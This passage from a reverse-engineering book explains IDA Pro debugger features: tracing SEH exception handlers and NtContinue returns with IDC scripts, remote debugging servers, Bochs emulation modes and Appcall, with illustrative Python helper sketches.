The first three lines show summary information about the segment, while the fourth line ➊ contains the first dword of the section, indicating that the first exception handler record may be found at address 22FFE0h (offset dword_22FFE0). If no exception handlers were installed for this particular thread, the first dword in the TEB would contain the value 0FFFFFFFFh, indicating that the end of the exception handler chain had been reached. In this example, examining two dwords at address 22FFE0h shows the following:

Stack[000009E0]:0022FFE0 dword_22FFE0 dd 0FFFFFFFFh   ; ➊ DATA XREF: TIB[000009E0]:7FFDF000↓o
Stack[000009E0]:0022FFE4 dd offset loc_7C839AA8       ; ➋

11. See http://www.hexblog.com/2005/12/tracing_exception_handlers.html.

The first dword ➊ contains the value 0FFFFFFFFh, indicating that this is the last exception handler record in the chain. The second dword ➋ contains the address 7C839AA8h (offset loc_7C839AA8), indicating that the function at loc_7C839AA8 should be called to process any exceptions that may arise during the execution of the process. If we were interested in tracing the handling of any exceptions in this process, we might begin by setting a breakpoint at address 7C839AA8h.
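Walking the chain amounts to following next pointers until the 0FFFFFFFFh terminator is reached. The Python sketch below does this over a mock memory populated with the values from the listings above. The walk_seh_chain function, its read_dword callback, and the cycle and length guards are assumptions added for illustration.

```python
END_OF_CHAIN = 0xFFFFFFFF


def walk_seh_chain(read_dword, tib_base, max_records=64):
    """Return a list of (record_address, handler_address) pairs.

    read_dword: callable that returns the 32-bit value stored at an address.
    tib_base:   address of the TIB; its first dword heads the SEH chain.
    """
    handlers = []
    seen = set()
    record = read_dword(tib_base)
    while (record != END_OF_CHAIN and record not in seen
           and len(handlers) < max_records):
        seen.add(record)                       # guard against a looping chain
        handlers.append((record, read_dword(record + 4)))
        record = read_dword(record)            # follow the next pointer
    return handlers


# Mock memory built from the example listings.
memory = {
    0x7FFDF000: 0x0022FFE0,   # TIB: pointer to first handler record
    0x0022FFE0: 0xFFFFFFFF,   # record: next pointer (end of chain)
    0x0022FFE4: 0x7C839AA8,   # record: handler function
}

chain = walk_seh_chain(memory.__getitem__, 0x7FFDF000)
for record, handler in chain:
    print("record %08X -> handler %08X" % (record, handler))
```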

Because it is a relatively simple task to walk the SEH chain, a useful fea-

ture for the debugger to implement would be a display of the chain of SEH

handlers that are installed for the current thread. Given such a display, it

should be easy to navigate to each SEH handler, at which point you may

decide whether you want to insert a breakpoint within the handler or not.

Unfortunately, this is another feature available in OllyDbg that is not avail-

able in IDA’s debugger. To address this shortcoming, we have developed

an SEH Chain plug-in, which, when invoked from within the debugger,

will display the list of exception handlers that are installed for the current

thread. An example of this display is shown in Figure 25-12.

Figure 25-12: The SEH Chain display

This plug-in utilizes the SDK’s choose2 function to display a nonmodal

dialog that lists the current exception-handler chain. For each installed

exception handler, the address of the exception-handler record (the two-

dword list record) and the address of the corresponding exception handler

are displayed. Double-clicking an exception handler jumps the active dis-

assembly view (either IDA View-EIP or IDA View-ESP) to the address of the

SEH handler function. The entire purpose of this plug-in is to simplify the

process of locating exception handlers. The source code for the SEH Chain

plug-in may be found on the website for this book.

The flip side of the exception-handling process is the manner in which

an exception handler returns control (if it chooses to do so) to the applica-

tion in which the exception occurred. When an exception-handler function

is called by the operating system, the function is granted access to all of the

CPU registers’ contents as they were set at the moment the exception took

place. In the process of handling the exception, the function may elect to

modify one or more CPU register values prior to returning control to the

application. The intent of this process is for an exception handler to be given

the opportunity to repair the state of the process sufficiently so that the pro-

cess may resume normal execution. If the exception handler determines that

the process should be allowed to continue, the operating system is notified,

and the process’s register values are restored, using any modifications made

by the exception handler. As discussed in Chapter 21, some anti–reverse

engineering utilities make use of exception handlers to alter a process’s

flow of execution by modifying the saved value of the instruction pointer

during the exception-handling phase. When the operating system returns

control to the affected process, execution resumes at the address specified by

the modified instruction pointer.

In his blog post on tracing exceptions, Ilfak discusses the fact that Win-

dows SEH exception handlers return control to the affected process via the

ntdll.dll function NtContinue (also known as ZwContinue). Since NtContinue has

access to all of the process’s saved register values (via one of its arguments), it

is possible to determine exactly where the process will resume execution by

examining the value contained in the saved instruction pointer from within

NtContinue. Once we know where the process is set to resume execution, we

can set a breakpoint in order to avoid stepping through operating system

code and to stop the process at the earliest opportunity once it resumes exe-

cution. The following steps outline the process we need to follow:

1. Locate NtContinue and set a nonstopping breakpoint on its first instruction.

2. Add a breakpoint condition to this breakpoint.

3. When the breakpoint is hit, obtain the address of the saved registers by

reading the CONTEXT pointer from the stack.

4. Retrieve the process’s saved instruction pointer value from the CONTEXT

record.

5. Set a breakpoint on the retrieved address and allow execution to

continue.

Using a process similar to the debugger-hiding script, we can automate

all of these tasks and associate them with the initiation of a debugging ses-

sion. The following code demonstrates launching a process in the debugger

and setting a breakpoint on NtContinue:

static main() {

auto func;

RunTo(BeginEA());

GetDebuggerEvent(WFNE_SUSP, -1);

func = LocByName("ntdll_NtContinue");

AddBpt(func);

SetBptCnd(func, "bpt_NtContinue()");

}

The purpose of this code is simply to set a conditional breakpoint on the

entry of NtContinue. The behavior of the breakpoint is implemented by the

IDC function bpt_NtContinue, which is shown here:

static bpt_NtContinue() {

   auto p_ctx = Dword(ESP + 4);           //➊ get CONTEXT pointer argument
   auto next_eip = Dword(p_ctx + 0xB8);   //➋ retrieve eip from CONTEXT
   AddBpt(next_eip);                      //➌ set a breakpoint at the new eip
   SetBptCnd(next_eip, "Warning(\"Exception return hit\") || 1");   //➍
   return 0;                              //don’t stop
}

This function locates the pointer to the process’s saved register context information ➊, retrieves the saved instruction pointer value from offset 0xB8 within the CONTEXT structure ➋, and sets a breakpoint on this address ➌. In order to make it clear to the user why execution has stopped, a breakpoint condition (which is always true) is added to display a message to the user ➍. We choose to do this because the breakpoint was not set explicitly by the user, and the user may not correlate the event to the return from an exception handler.
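The 0xB8 offset follows from the layout of the 32-bit x86 CONTEXT structure. As a cross-check, the Python sketch below rebuilds the leading portion of that layout with ctypes and asks for the field offsets. The class name CONTEXT32 is an assumption, and the trailing ExtendedRegisters array is omitted because it lies after every field of interest.

```python
import ctypes

DWORD = ctypes.c_uint32


class FLOATING_SAVE_AREA(ctypes.Structure):
    _fields_ = [
        ("ControlWord", DWORD), ("StatusWord", DWORD), ("TagWord", DWORD),
        ("ErrorOffset", DWORD), ("ErrorSelector", DWORD),
        ("DataOffset", DWORD), ("DataSelector", DWORD),
        ("RegisterArea", ctypes.c_ubyte * 80),
        ("Cr0NpxState", DWORD),
    ]


class CONTEXT32(ctypes.Structure):
    """Leading fields of the 32-bit x86 CONTEXT record."""
    _fields_ = [
        ("ContextFlags", DWORD),
        ("Dr0", DWORD), ("Dr1", DWORD), ("Dr2", DWORD), ("Dr3", DWORD),
        ("Dr6", DWORD), ("Dr7", DWORD),
        ("FloatSave", FLOATING_SAVE_AREA),
        ("SegGs", DWORD), ("SegFs", DWORD), ("SegEs", DWORD), ("SegDs", DWORD),
        ("Edi", DWORD), ("Esi", DWORD), ("Ebx", DWORD),
        ("Edx", DWORD), ("Ecx", DWORD), ("Eax", DWORD),
        ("Ebp", DWORD), ("Eip", DWORD), ("SegCs", DWORD),
        ("EFlags", DWORD), ("Esp", DWORD), ("SegSs", DWORD),
    ]


print(hex(CONTEXT32.Eip.offset))   # offset of the saved instruction pointer
print(hex(CONTEXT32.Dr0.offset))   # the debug registers start right after ContextFlags
```

The same structure gives the offsets of the saved debug registers (Dr0 through Dr7), which is useful if a breakpoint function needs to inspect or restore them.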

This example represents a simple means of handling exception returns.

Much more sophisticated logic could be added to the breakpoint function

bpt_NtContinue. For example, if you suspect that an exception handler is

manipulating the contents of debug registers, perhaps to prevent you from

setting hardware breakpoints, you might opt to restore the values of the

debug registers to known good values prior to returning control to the pro-

cess being debugged.

Summary

In addition to their obvious uses in tracking down bugs in software, debug-

gers may also be used as effective reverse engineering tools. For malware and

obfuscated code analysis, the ability to utilize a single application for both

static and dynamic analysis can save valuable time and the effort required to

generate data with one tool that can be analyzed with a second tool. Given

the wide variety of debuggers available today, IDA’s debugger may not be the

ideal choice for tracking down runtime problems in your applications. How-

ever, if you anticipate the need to conduct any reverse engineering of an

application or if you simply desire a high-quality disassembly to refer to dur-

ing the debugging process, IDA’s debugger may serve your needs well. In

Chapter 26, we conclude the book by covering more advanced features of

IDA’s debugger, including remote debugging and debugging on Linux and

OS X.

ADDITIONAL DEBUGGER FEATURES

Over the last two chapters, we have covered

the majority of the debugger’s basic features

including scripting debugger actions, as well as

its usefulness in de-obfuscating code. In this chapter,

we round out our discussion of the debugger by looking

at remote debugging with IDA, the use of the Bochs x86 emulator¹ as a debugging
platform, and the Appcall² feature that effectively extends IDA’s scripting
capabilities to include any function defined within a process and its associated
libraries.

Remote Debugging with IDA

All versions of IDA ship with server components designed to facilitate remote

debugging sessions. In addition, IDA is capable of interfacing with remote

gdb sessions that make use of gdbserver or built-in gdb stubs. One of the

1. See http://bochs.sourceforge.net/.

2. See http://www.hexblog.com/?p=112.

570 Chapter 26

principal advantages of remote debugging is the ability to use the GUI

debugger interface as a frontend for any debugging session. For the most

part, other than initial setup and establishing the connection to the remote

debugging server, remote debugging sessions differ little from local debug-

ging sessions.

Using a Hex-Rays Debugging Server

Remote debugging begins by launching an appropriate debugging server

component on the computer on which a process is to be debugged. IDA

ships with the following server components:

win32_remote.exe Server component executed on Windows computers

for the purpose of debugging 32-bit Windows applications

win64_remotex64.exe Server component executed on 64-bit Windows

computers for the purpose of debugging 64-bit Windows applications

(IDA Advanced only)

wince_remote_arm.dll Server component uploaded to Windows CE

devices (via ActiveSync)

mac_server Server component executed on OS X computers for the pur-

pose of debugging 32-bit OS X applications

mac_serverx64 Server component executed on 64-bit OS X computers

for the purpose of debugging 64-bit OS X applications (IDA Advanced

only)

linux_server Server component executed on Linux computers for the

purpose of debugging 32-bit Linux applications

linux_serverx64 Server component executed on 64-bit Linux computers

for the purpose of debugging 64-bit Linux applications (IDA Advanced

only)

armlinux_server Server component executed on ARM-based computers

for the purpose of debugging ARM applications

android_server Server component executed on Android devices for the

purpose of debugging Android applications

In order to perform remote debugging on any platform, the only compo-

nent you are required to execute on that platform is the appropriate server

component. It is not necessary to install a full version of IDA on the remote

platform. In other words, if you intend to use a Windows version of IDA as

your debugging client, and you wish to remotely debug Linux applications,

the only file, other than the binary that is being debugged, that you need to

copy to and execute on the Linux system is linux_server.³

3. Note that the *_server binaries distributed with IDA depend on a number of shared libraries.

You can use ldd (or otool -L on OS X) to list these dependencies.

Regardless of the platform you intend to run the server on, the server

components accept three command-line options, as listed here:

-p<port number> is used to specify an alternate TCP port for the server to listen on. The default port is 23946. Note that no space should be entered between the -p and the port number.

-P<password> is used to specify a password that must be supplied in order for a client to connect to the debug server. Note that no space should be entered between the -P and the provided password.

-v places the server in verbose mode.

There is no option to restrict the IP address on which the server listens.

If you wish to restrict incoming connections, you may do so using host-based

firewall rules as applicable to your debugging platform. Once a server has

been launched, IDA may be executed from any supported operating system

and used to provide a client interface to the debug server; however, a server

can handle only one active debugging session at any given time. If you wish

to maintain several simultaneous debugging sessions, you must launch sev-

eral instances of the debugging server on several different TCP ports.
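
The command-line rules above are easy to get wrong by hand, particularly the requirement that no space separate an option from its value. The following Python sketch shows one way to assemble the argument list for one or more server instances. The function names and the idea of numbering ports upward from the default are illustrative assumptions, not part of IDA.

```python
DEFAULT_PORT = 23946  # default listening port stated in the text


def server_command(binary, port=None, password=None, verbose=False):
    """Build the argument list for a single debug server instance.

    'binary' is the path to a server component such as ./linux_server.
    """
    argv = [binary]
    if port is not None:
        if not 0 < port < 65536:
            raise ValueError("port out of range: %r" % (port,))
        argv.append("-p%d" % port)       # no space between -p and the port
    if password is not None:
        argv.append("-P" + password)     # no space between -P and the password
    if verbose:
        argv.append("-v")
    return argv


def commands_for_sessions(binary, count, first_port=DEFAULT_PORT):
    """One server instance per session, each on its own TCP port.

    Consecutive port numbers are an arbitrary choice for this sketch.
    """
    return [server_command(binary, first_port + i) for i in range(count)]
```

Each returned list could be handed to subprocess.Popen on the debugging host. Because a server handles only one active session at a time, commands_for_sessions("./linux_server", 3) yields three separate command lines rather than one.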

From the client perspective, remote debugging is initiated by specifying

a server hostname and port via the Debugger ▸ Process Options command,

as shown in Figure 26-1. This action must be performed prior to starting or

attaching to the process you intend to debug.

Figure 26-1: The debugger process options dialog

The first four fields in this dialog apply to both local and remote debug-

ging sessions, while the Hostname, Port, and Password fields apply only to

remote debugging sessions. The fields of this dialog are summarized here.

Application The full path to the application binary that you wish to

debug. For local debugging sessions, this is a path in the local filesystem.

For a remote debugging session, this is the path on the debugging server.

If you choose not to use a full path, the remote server will search its cur-

rent working directory.

Input file The full path to the file that was used to create the IDA data-

base. For local debugging sessions, this is a path in the local filesystem.

For a remote debugging session, this is the path on the debugging server.

If you choose not to use a full path, the remote server will search its cur-

rent working directory.

Directory The working directory in which the process should be

launched. For local debugging, this directory must exist in the local

filesystem. For remote debugging, this is a directory on the debugging

server.

Parameters Used to specify any command-line parameters to be passed

to the process when it is started. Note that shell metacharacters (such as

<, >, and |) are not honored here. Any such characters will be passed to

the process as command-line arguments. Thus it is not possible to launch

a process under the debugger and have that process perform any sort of

input or output redirection. For remote debugging sessions, process out-

put is displayed in the console that was used to launch the debugging

server.

Hostname The hostname or IP address of the remote debugging

server. Leave this field blank for local debugging sessions.

Port The TCP port number on which the remote debugging server is

listening.

Password The password expected by the remote debugging server.

Note that the data entered into this field is not masked, making it possi-

ble for the password to be viewed by anyone who can observe your dis-

play. Further, this password is transmitted to the remote server as plain

text, making it observable by anyone who can intercept your network

packets.
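
Before filling in the Hostname and Port fields, it can be useful to confirm that something is actually listening at the address you plan to enter. The sketch below is a generic TCP reachability check written with Python's standard socket module. It knows nothing about the debug server's protocol, and the function name is hypothetical. It opens and immediately closes a connection, so run it before you start a session rather than during one.

```python
import socket

DEFAULT_IDA_PORT = 23946  # default debug server port stated in the text


def server_reachable(host, port=DEFAULT_IDA_PORT, timeout=2.0):
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and name resolution failures.
        return False

# Example use (hypothetical host name):
#   if not server_reachable("lab-linux-box"):
#       print("No listener found; is linux_server running?")
```

A True result says only that the port accepts connections. It does not verify the password or that the listener is an IDA debug server.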

At first glance, the Application and Input File fields in Figure 26-1 may

seem to be identical. When the file opened in your IDA database is the same

as the executable file that you wish to run on the remote computer, these

two fields will hold the same value. However, in some cases, you may wish to

debug a library file (such as a DLL) that you are analyzing in an IDA data-

base. It is not possible to debug a library file directly because library files are

not standalone executables. In such cases, you will set the Input File field to

the path of the library file. The Application field must be set to the name of

an application that makes use of the library file that you wish to debug.

The procedures for connecting to a remote gdb server are nearly identi-

cal to the procedures for attaching to a remote IDA debugging server with

two minor exceptions. First, no password is required to connect to gdbserver,

and second, IDA allows specification of gdb-specific behaviors via the Set spe-

cific options button within the debugger setup dialog. Figure 26-2 shows the

GDB Configuration dialog.

Figure 26-2: GDB Configuration dialog

Of note is the fact that IDA has no way of knowing the architecture of

the computer on which gdbserver is running and that you are obligated

to specify a processor type (which defaults to Intel x86) and potentially the

endian-ness of that processor. IDA is currently capable of providing a debug-

ging interface for x86, ARM, PowerPC, and MIPS processors.

Attaching to a Remote Process

A number of different scenarios exist if you intend to attach to a running

process on your remote debugging server. First, if you have no database open

in IDA, you may select DebuggerAttach and choose from IDA’s list of avail-

able debuggers. If you choose one of IDA’s remote debuggers, you are pre-

sented with the configuration dialog shown in Figure 26-3.

Figure 26-3: Remote debugger configuration

Once you provide the appropriate connection parameters and click OK,

IDA obtains and displays a process list from the remote debugging server,

allowing you to select and attach to a specific process.

In the second scenario, you might already have a binary open in IDA

and wish to attach to a remote process. In this case you may need to select a

debugger (if none has been previously specified for the open file type) or

switch your debugger type (if a remote debugger is not currently selected).

Once a debugger has been selected, you must provide hostname and pass-

word information for the remote debugger server, as shown in Figure 26-1,

at which point you may attach to a remote process using Debugger ▸ Attach to Process.

Exception Handling During Remote Debugging

In Chapter 25 we discussed the IDA debugger’s handling of exceptions and

how to modify the debugger’s exception-handling behavior. During remote

debugging sessions, the debugger’s default exception-handling behavior

is dictated by the exceptions.cfg file, which resides on the client machine (the

machine on which you are actually running IDA). This allows you to modify

exceptions.cfg and reload the changes via the Debugger Setup dialog (see Fig-

ure 25-4) without the need to access the remote server.

Using Scripts and Plug-ins During Remote Debugging

During a remote debugging session, it remains possible to utilize scripts and

plug-ins to automate debugging tasks. Any scripts or plug-ins that you choose

to execute will run within IDA on the client machine. IDA will in turn handle

any actions that are required to interact with the remote process, such as set-

ting breakpoints, querying state, modifying memory, or resuming execution.

From the script’s perspective, all behaviors will appear just as if the debug-

ging session was taking place locally. The only thing to remember is to make

sure that your scripts and plug-ins are tailored to the architecture on which

the target process is running and not the architecture on which the IDA cli-

ent is running (unless they happen to be the same). In other words, if you

are running the Windows version of IDA as a client for remote debugging

on Linux, do not expect your Windows debugger-hiding script to do you

any good.

Debugging with Bochs

Bochs is an open source x86 emulation environment. Bochs is capable of

full-system emulation of x86 computer systems and includes emulation for

common I/O devices and a custom BIOS. Bochs provides an emulation-

based alternative to virtualization software such as VMware Workstation. Elias

Bachaalany of the Hex-Rays development team has taken the lead on integrat-

ing Bochs with IDA to provide an emulation-based alternative to traditional

debugging.⁴ Windows versions of IDA ship with and install a compatible version
of Bochs, while non-Windows users wishing to make use of Bochs must
make sure that version 2.4.2 or later is installed on their system.

With Bochs installed, IDA offers a Local Bochs debugger choice when-

ever you have an x86 binary open in IDA. The availability of Bochs offers

the opportunity to perform local debugging of Windows applications on

non-Windows systems, because the application will be emulated rather than

executed as a native process. Because it’s an emulator, Bochs configuration

options differ somewhat from those available with more traditional debug-

gers. One of the most important things to understand about Bochs is that it

can operate in three distinct modes: disk image mode, IDB mode, and PE

mode. The choice of mode is made using the Bochs-specific debugger configuration
dialog shown in Figure 26-4.

Figure 26-4: Bochs debugger options dialog

Each of the available modes offers a drastically different degree of fidel-

ity in terms of the quality and type of emulation being performed.

Bochs IDB Mode

Working from the ground up, IDB is the most basic Bochs mode. In IDB

mode, the only code that Bochs is aware of is the code contained in your

database. Memory regions are mapped into Bochs and populated by copying

bytes from the database. A configurable amount of stack space is provided

based on settings in the Bochs options dialog, and IDA will make its own

decision as to where the stack will be allocated. Emulated execution begins

(meaning the instruction pointer is initially positioned) at the database sym-

bol named ENTRY if one has been defined. If an ENTRY symbol is not present,

IDA tests to see if a range of locations is currently selected in the open data-

base and uses the beginning of the range as the debugger entry point. If

no selection exists, then the current cursor location is taken as the initial

instruction pointer value. When running in IDB mode, keep in mind that

4. See “Designing a minimal operating system to emulate 32/64bits x86 code snippets, shellcode

or malware in Bochs” from Recon 2011 (http://www.recon.cx/).

Bochs has no notion of any operating system support such as shared libraries

or the location of any well-known structures within a typical process address

space. It is equally possible to step through a PE file, an ELF file, a Mach-O

file, or a raw blob of machine code such as an exploit payload as long as

the code makes no reference to anything that might reside outside the database.
One way that IDB mode might be used is to execute a single function in an
effort to understand its behavior without having to craft a complete
process or disk image to do so.
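
The order in which the initial instruction pointer is chosen in IDB mode can be summarized in a few lines of Python. This is only a model of the decision described above, not code taken from IDA. The function name and its parameters are hypothetical, and None is used to mean "not present."

```python
def pick_entry_point(entry_symbol_ea=None, selection=None, cursor_ea=None):
    """Model the IDB-mode choice of starting address.

    entry_symbol_ea -- address of the symbol named ENTRY, or None
    selection       -- (start, end) of the selected range, or None
    cursor_ea       -- address under the cursor
    """
    if entry_symbol_ea is not None:
        return entry_symbol_ea      # 1. an ENTRY symbol wins if defined
    if selection is not None:
        start, _end = selection
        return start                # 2. otherwise, the start of the selection
    return cursor_ea                # 3. otherwise, the cursor location
```

For example, with no ENTRY symbol and a selection covering 0x402000 through 0x402010, the model returns 0x402000. In practice this means you can start emulation at an arbitrary function simply by selecting it or placing the cursor on its first instruction.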

Bochs PE Mode

PE mode offers the opportunity to debug at something approaching the

process level. When PE mode is selected and activated, IDA’s Bochs control

module (an IDA plug-in) takes over and behaves much like the Windows

process loader would if you were actually launching a native Windows pro-

cess. A PE mode process receives process (PEB) and thread (TEB) environ-

ment blocks, along with a stack that mimics those that would be created in

an actual process.

The Bochs plug-in also loads (without executing any code) a number of

common Windows libraries into the emulated process address space in order

to properly handle any library calls made by the process. The exact set of

libraries that Bochs loads on debugger start is configurable and is specified

in <IDADIR>/plugins/bochs/startup.idc. Any library may be loaded as is or may

be designated to be stubbed out. If a library is marked to be stubbed, then the

Bochs plug-in will automatically hook every function exported by that library

and redirect execution to a Bochs interception function (refer to startup.idc

and the IDA help system for more details). This stubbing technique provides

an extensible means for users to define custom behaviors for any library

function. For any library that is stubbed by IDA, it is possible to define a cor-

responding script file in which you may define your custom behaviors. For

any library, foolib.dll for example, the Bochs plug-in scans for a related script

named api_foolib.idc or api_foolib.py within the <IDADIR>/plugins/bochs direc-

tory. IDA ships with <IDADIR>/plugins/bochs/api_kernel32.idc, which provides

a good example of the structure of such a file and the implementation of cus-

tom behaviors for a number of functions.
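
The naming convention for these per-library scripts is mechanical, so it can be expressed as a small helper. The following Python sketch derives the two candidate script names for a given library. The function name is hypothetical, and the order in which the .idc and .py variants are listed is an assumption, since the text does not say which one the plug-in prefers.

```python
import posixpath


def candidate_api_scripts(library, bochs_dir):
    """Return the script paths that would correspond to a stubbed library.

    library   -- file name of the library, e.g. "foolib.dll"
    bochs_dir -- the <IDADIR>/plugins/bochs directory
    """
    base, _ext = posixpath.splitext(library)   # "foolib.dll" -> "foolib"
    return [posixpath.join(bochs_dir, "api_%s%s" % (base, ext))
            for ext in (".idc", ".py")]
```

Calling candidate_api_scripts("kernel32.dll", "/opt/ida/plugins/bochs") produces a list whose first element names the api_kernel32.idc file mentioned above. The /opt/ida prefix is just a placeholder for your own installation directory.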

The ability to hook library functions and define custom implementations

is important in PE mode because there is no operating system layer to perform

all of the heavy lifting needed by the shared libraries. For example, by provid-

ing an alternate, script-based behavior for a function such as VirtualAlloc,

which would fail if it could not communicate with the operating system, it is

possible to convince (to some degree) the emulated process that it is run-

ning as an actual process. The goal when creating such script-based behav-

iors is to provide the emulated process with the responses it would expect to

see if it were communicating with the actual library functions, which in turn

were communicating with the actual operating system.
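
To make the idea of a script-based replacement more concrete, here is a conceptual Python model of the bookkeeping that a stand-in for VirtualAlloc would need to do. It is not written in the format that the Bochs plug-in expects (consult startup.idc and api_kernel32.idc for that). The class name, base address, and simplified behavior are all assumptions made for illustration.

```python
PAGE_SIZE = 0x1000


class FakeAllocator:
    """Hands out page-aligned address ranges as a VirtualAlloc stub might."""

    def __init__(self, base=0x10000000):
        self.next_free = base   # arbitrary starting address for this model
        self.regions = {}       # address -> (size, alloc_type, protect)

    def virtual_alloc(self, address, size, alloc_type, protect):
        if size <= 0:
            return 0            # the real function returns NULL on failure
        # Round the request up to a whole number of pages.
        rounded = (size + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)
        if address == 0:
            # The caller let us choose, so take the next unused range.
            address = self.next_free
            self.next_free += rounded
        # Simplification: a caller-supplied address is accepted as is.
        self.regions[address] = (rounded, alloc_type, protect)
        return address
```

The emulated process only needs to receive a plausible, consistent return value. A real stub would also have to make the returned range usable inside the emulator, which this model leaves out.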

If you use IDA on a non-Windows platform, you may take full advantage

of Bochs PE mode by copying any required libraries (as specified in startup.idc)

from a Windows system onto your IDA system and editing startup.idc to point

at the directory containing all of the copied libraries. The following listing

shows an example of the required changes.

// Define additional DLL path

// (add triple slashes to enable the following lines)

/// path /home/idauser/xp_dlls/=c:\winnt\system32\

When using PE mode, one difference you will note when launching a

process under Bochs is that IDA does not open a warning dialog to remind

you of the danger of launching a potentially malicious process under debug-

ger control. This is because the only process that gets created is the Bochs

emulator process, and all of the code that you are debugging is viewed by the

Bochs emulator as data that happens to represent code for it to emulate. No

native process is ever created from the binary that you are debugging.

Bochs Disk Image Mode

The third mode of operation for the Bochs debugger is called disk image

mode. Aside from IDA’s ability to make use of Bochs, Bochs is a full-blown

x86 system emulator on its own. It is quite possible to create hard drive

images, using the bximage tool supplied with Bochs; install an operating sys-

tem on the disk image, using Bochs and any required installation medium

for the desired operating system; and ultimately use Bochs to run your guest

operating system within an emulated environment.

If your primary goal in using IDA/Bochs is to understand the behavior

of a single process, then disk image mode may not be for you. Isolating and

observing a single process executing within a fully emulated operating system

is not an easy task and requires a detailed understanding of the operating sys-

tem and how it manages processes and memory. Where you may find IDA/

Bochs useful is in analyzing system BIOS and boot code, which can be fol-

lowed relatively easily before the operating system code takes over.

In disk image mode, you have no executable file image to load into IDA.

Instead, IDA ships with a loader that recognizes Bochs configuration (bochsrc)

files.⁵ A bochsrc file is used to describe the hardware execution environment

when Bochs is used as a full system emulator. IDA’s default bochsrc file is

located at <IDADIR>/cfg/bochsrc.cfg. Among other things, a bochsrc file is used

to specify the locations of the system BIOS, video ROM, and disk image files.

IDA’s bochsrc loader offers minimal loading services, doing nothing more

than reading the first sector of the first disk image file specified in the Bochs

configuration file being loaded and then selecting the Bochs debugger for

use with the new database. The use of IDA/Bochs in a master boot record

development scenario is discussed on the Hex-Rays blog.⁶

5. See http://bochs.sourceforge.net/doc/docbook/user/bochsrc.html for information on the bochsrc file

format.

6. See http://www.hexblog.com/?p=103.

Appcall

The debugger’s Appcall feature effectively extends the capabilities of IDC or

IDAPython to make any function in the active process callable from a script.

There are many uses for such a capability, including mapping additional memory
into the process address space (by calling VirtualAlloc or similar), injecting
new libraries into the process being debugged (by calling LoadLibrary), and
calling functions within the process to perform tasks you would rather not
perform manually, such as decoding blocks of data or computing hash values.

In order to make use of Appcall, the function you wish to invoke must

be loaded in the address space of the process being debugged, and IDA must

know or be informed of the function’s prototype so that parameters may be

marshaled and unmarshaled properly. Any Appcall that you do make will be

made in the context of the current debugger thread after first saving the

thread’s state (essentially all registers associated with the thread). Once the

Appcall completes, IDA restores the thread state, and the debugger is ready

to resume execution as if no Appcall had ever taken place.

Let’s look at an example in which Appcall is used to allocate a 4096-byte

block of memory into the current (Windows) process address space. In this

case, the Windows API function that we wish to invoke is named VirtualAlloc

and its prototype is shown here:

LPVOID WINAPI VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize,

DWORD flAllocationType, DWORD flProtect);

The call that we wish to make using Appcall might look something like

the following if we were to write it in C:

VirtualAlloc(NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

This function call ultimately translates into the following once all of the

constants are resolved:

VirtualAlloc(0, 4096, 0x3000, 4);
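
If you want to check the arithmetic behind that translation, the short Python sketch below combines the constants by hand. The numeric values are the ones defined in the Windows SDK headers. The variable names are ordinary Python names chosen to mirror the C constants.

```python
# Values as defined in the Windows SDK headers.
MEM_COMMIT = 0x1000
MEM_RESERVE = 0x2000
PAGE_READWRITE = 0x04

# The four arguments in the order VirtualAlloc expects them.
args = (0, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)

# Render the call with the flags shown in hexadecimal.
call_text = "VirtualAlloc(%d, %d, %#x, %d);" % args
print(call_text)
```

Because scripts see only integers, resolving symbolic constants in this way is a step you perform yourself before making the call.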

Recall that while a Windows process is being debugged, IDA prefixes the

name of every library function with the name of the library to which the func-

tion belongs. Thus, VirtualAlloc will be named kernel32_VirtualAlloc when the

debugger is active, as shown in the following listing:

kernel32.dll:766B2FB6 ; ====== S U B R O U T I N E ========

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 ; Attributes: bp-based frame

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 kernel32_VirtualAlloc proc near

No type information is displayed because IDA’s type libraries know noth-

ing about a function named kernel32_VirtualAlloc. Since Appcall requires

knowledge of a function’s type signature, we must add the information into

the database ourselves using the Set Function Type command. An exact type

signature is not required as long as the signature we specify allows IDA to

properly transfer our parameters to the function we are invoking. In this

case, we supply the following signature:

kernel32.dll:766B2FB6 ; Attributes: bp-based frame

kernel32.dll:766B2FB6

kernel32.dll:766B2FB6 ; int __stdcall kernel32_VirtualAlloc(int, int, int, int)

kernel32.dll:766B2FB6 kernel32_VirtualAlloc proc near

At this point we are ready to use Appcall to have more memory allocated

into our process. Using IDC, this is extremely easy because all we need to do

is invoke the function just as if it were an IDC function. Entering the function

call at the IDA command line and using the Message function to display the

results yields the following output:

IDC>Message("%x\n", kernel32_VirtualAlloc(0, 4096, 0x3000, 4));

3c0000

The result in this case is a new 4096-byte block allocated to the process at

address 0x3c0000. In order to make the new memory block show up in IDA,

we must use the DebuggerRefresh memory command or wait for IDA to

perform a refresh in conjunction with other debugger operations.

The syntax for performing an Appcall in Python is slightly different,

making use of the Appcall variable defined in the idaapi module. However,

the requirements to have a named function with an assigned type signature

remain. When performed in Python, the same Appcall to VirtualAlloc would

be done as follows:

Python>Message("%x\n" % Appcall.kernel32_VirtualAlloc(0, 4096, 0x3000, 4))

3d0000

Additional information and examples related to Appcall and its uses may

be found on the Hex-Rays blog.⁷

Summary

Whether through the efforts of the Hex-Rays development team or through

user contributions, IDA’s debugger is continually evolving. The best place to

keep up with all of these changes is the Hex-Rays blog (http://www.hexblog

.com/), where the Hex-Rays developers frequently preview features that will

appear in upcoming versions of IDA. Keeping up with user-contributed

7. See http://www.hexblog.com/?p=113.

extensions requires a little more effort. Occasionally, interesting IDA exten-

sions are announced in the IDA support forums, but you are just as likely to

see them announced in various reverse engineering forums (such as http://

www.openrce.org/), see them entered into Hex-Rays’s annual plug-in writing

contest, or simply stumble across them while performing an Internet search.

IDA’s debugger is both full featured and extensible. With both local and

remote capabilities, as well as the ability to act as a frontend to a number of

popular debuggers such as gdb and WinDbg, IDA offers a consistent debug-

ging interface across a large number of popular platforms. Given the ability

to script extensions or build compiled debugger plug-ins, the limits of the

debugger’s capabilities are constantly being extended. Among current debug-

gers, IDA’s debugger enjoys perhaps the most active development and bene-

fits from the fact that all of its core developers are themselves accomplished

reverse engineers who share a personal as well as professional interest in mak-

ing the debugger a powerful and useful tool.

USING IDA FREEWARE 5.0

